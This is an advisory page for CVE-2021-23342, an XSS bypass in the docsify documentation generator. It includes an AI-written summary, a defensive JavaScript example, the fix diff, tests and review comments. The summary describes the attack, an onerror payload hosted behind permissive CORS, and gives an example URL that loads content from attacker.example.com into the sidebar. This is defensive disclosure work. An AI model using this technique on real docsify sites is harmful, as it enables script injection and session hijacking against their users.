VYPR
Moderate severity · NVD Advisory · Published Feb 19, 2021 · Updated Sep 16, 2024

Cross-site Scripting (XSS)

CVE-2021-23342

Description

This affects the package docsify before 4.12.0. It is possible to bypass the remediation done by CVE-2020-7680 and execute malicious JavaScript through the following methods:

1) When parsing HTML from remote URLs, the HTML code on the main page is sanitized, but this sanitization is not taking place in the sidebar.
2) The isURL external check can be bypassed by inserting more “////” characters.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

CVE-2021-23342 is an XSS vulnerability in docsify <4.12.0, bypassing a prior fix by not sanitizing the sidebar HTML and allowing external URL checks to be evaded via extra slashes.

Vulnerability Overview

CVE-2021-23342 affects the docsify documentation site generator before version 4.12.0 [1]. The flaw allows an attacker to bypass the remediation applied for CVE-2020-7680 and inject malicious JavaScript via two distinct bypass methods [2].

Root Cause and Bypass

The first bypass occurs because the HTML sanitization applied to content parsed from remote URLs on the main page is not applied to the sidebar, leaving it vulnerable to stored Cross-site Scripting (XSS) [2]. The second bypass involves the isURL external check, which can be evaded by inserting additional forward-slash characters (e.g., ////) into the URL, causing the validation to incorrectly treat a remote resource as internal [1][2].

Attack Scenarios and Impact

An attacker can host a malicious HTML page that includes an XSS payload (such as an HTML tag with an `onerror` handler) on a server configured with a permissive CORS header [2]. By crafting a docsify URL pointing to that remote resource (e.g., `http://yourdocsifyserver/#//attacker.example.com/test.php/`), the unsanitized content is loaded into the sidebar, executing arbitrary JavaScript in the context of the docsify site [2]. This can lead to session hijacking, data theft, or other client-side attacks.

Mitigation

Users should upgrade to docsify 4.12.1 (or later) which contains the complete fix, including proper sanitization of sidebar content and a corrected isURL regular expression that rejects URLs with excessive slashes [3][4].
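
The slash-count bypass and the corrected pattern described above, as an added example (not docsify's own code): it runs the before and after regular expressions from this page's fix commit over constructed paths and compares both with an origin check built on the WHATWG URL parser. The function names, the `docs.example.test` site and the `example.org` host are assumptions.

```javascript
// Added example, not docsify source. The two patterns are copied from the
// fix-commit diff on this page; everything else is an assumption.
const OLD_PATTERN = /^([^:/?#]+:)?(?:\/\/([^/?#]*))?([^?#]+)?(\?[^#]*)?(#.*)?/;
const FIXED_PATTERN = /^([^:/?#]+:)?(?:\/{2,}([^/?#]*))?([^?#]+)?(\?[^#]*)?(#.*)?/;

// Assumed model of the check: a path counts as external when the pattern
// captures a scheme or a host that differs from the site's own.
function isExternalByPattern(pattern, path, site) {
  const [, scheme, host] = path.match(pattern); // every group is optional, so match() never returns null
  if (scheme && scheme.toLowerCase() !== site.protocol) return true;
  return Boolean(host) && host !== site.host;
}

// Alternative check: resolve the path the way a browser would (WHATWG URL
// parsing) and compare origins instead of pattern-matching the raw string.
function isExternalByOrigin(path, site) {
  try {
    return new URL(path, site.href).origin !== site.origin;
  } catch {
    return true; // unparseable input is treated as external
  }
}

// Constructed inputs; docs.example.test and example.org are placeholder hosts.
const SITE = new URL('https://docs.example.test/');
const SAMPLES = [
  '/test',
  'guide/intro.md',
  '//example.org/file.md',
  '///example.org/file.md',
  '////example.org/file.md',
];

// One row per sample: the verdict of the old pattern, the fixed pattern and
// the parser-based check.
function classifyAll() {
  return SAMPLES.map(path => ({
    path,
    old: isExternalByPattern(OLD_PATTERN, path, SITE),
    fixed: isExternalByPattern(FIXED_PATTERN, path, SITE),
    origin: isExternalByOrigin(path, SITE),
  }));
}

console.table(classifyAll());
```

With three or more slashes the old pattern captures an empty host and reports the path as internal, while the URL parser skips the extra slashes and resolves it to the other host; the fixed pattern and the origin check agree on every sample.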

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

| Package | Affected versions | Patched versions |
|---|---|---|
| docsify (npm) | < 4.12.0 | 4.12.0 |


Patches

ff2a66f12752

fix: isExternal check with malformed URL + tests (#1510)

https://github.com/docsifyjs/docsify · John Hildenbiddle · Feb 18, 2021 · via ghsa
2 files changed · +33 -1
  • src/core/fetch/index.js · +1 -1 · modified
    @@ -22,7 +22,7 @@ function loadNested(path, qs, file, next, vm, first) {
     
     function isExternal(url) {
       let match = url.match(
    -    /^([^:/?#]+:)?(?:\/\/([^/?#]*))?([^?#]+)?(\?[^#]*)?(#.*)?/
    +    /^([^:/?#]+:)?(?:\/{2,}([^/?#]*))?([^?#]+)?(\?[^#]*)?(#.*)?/
       );
       if (
         typeof match[1] === 'string' &&
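
Review bot: The widened quantifier in `isExternal` (`\/{2,}` in place of `\/\/`) still classifies the URL by pattern-matching the raw string, so the check holds only while the regex agrees with how the browser resolves the same string; the previous pattern failed because `([^/?#]*)` captured an empty host as soon as a third slash appeared. Consider resolving the value with the `URL` constructor and comparing origins, or at minimum add a comment above the regex stating that a run of two or more slashes is treated as the start of the authority and why.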
    
  • test/e2e/security.test.js · +32 -0 · added
    @@ -0,0 +1,32 @@
    +const docsifyInit = require('../helpers/docsify-init');
    +
    +describe(`Security`, function() {
    +  const sharedOptions = {
    +    markdown: {
    +      homepage: '# Hello World',
    +    },
    +    routes: {
    +      'test.md': '# Test Page',
    +    },
    +  };
    +
    +  describe(`Cross Site Scripting (XSS)`, function() {
    +    const slashStrings = ['//', '///'];
    +
    +    for (const slashString of slashStrings) {
    +      const hash = `#${slashString}domain.com/file.md`;
    +
    +      test(`should not load remote content from hash (${hash})`, async () => {
    +        await docsifyInit(sharedOptions);
    +        await expect(page).toHaveText('#main', 'Hello World');
    +        await page.evaluate(() => (location.hash = '#/test'));
    +        await expect(page).toHaveText('#main', 'Test Page');
    +        await page.evaluate(newHash => {
    +          location.hash = newHash;
    +        }, hash);
    +        await expect(page).toHaveText('#main', 'Hello World');
    +        expect(page.url()).toMatch(/#\/$/);
    +      });
    +    }
    +  });
    +});
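
Review bot: `slashStrings` covers only `'//'` and `'///'`, while the advisory for this fix describes the bypass as inserting more slashes ("////"); add `'////'` and a longer run so the `{2,}` quantifier is exercised beyond its first extra slash. The assertions also look only at `#main`, so a regression that loads remote content into the sidebar would still pass; assert on the sidebar element as well, and prefer a reserved name such as `example.com` over `domain.com` in the hash.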
    

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
